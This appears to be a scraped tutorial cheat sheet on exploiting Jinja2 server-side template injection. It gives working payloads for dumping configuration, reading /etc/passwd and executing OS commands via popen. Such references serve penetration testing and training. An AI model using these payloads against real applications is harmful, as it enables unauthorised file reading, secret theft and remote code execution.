Exploiting SSTI - Jinja2

Exploitation Techniques

1. Understanding Jinja2:

   • Jinja2 is commonly used in Python web frameworks like Flask and Django.

   • You can leverage libraries already imported by the application, and potentially import additional libraries.

2. Information Disclosure:

   • Dump Application Configuration:

     • Use the following payload to obtain internal configuration details:

       Copy

       {{ config.items() }}

     • Access the application at:

       Copy

       http://<SERVER_IP>:<PORT>/

   • Dump Built-in Functions:

     • To get a list of available built-in functions, use:

       Copy

       {{ self.__init__.__globals__.__builtins__ }}

     • This can help you understand what functions you can exploit.

3. Local File Inclusion (LFI):

   • To read local files, use the open function from the built-ins:

     • Payload to read /etc/passwd:

       Copy

       {{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

     • Access the application at:

       Copy

       CodeCopy Codehttp://<SERVER_IP>:<PORT>/

4. Remote Code Execution (RCE):

   • To execute remote commands, you can use functions from the os library:

     • First, import the os library and then execute a command:

       Copy

       {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

     • This payload will execute the id command and return the result.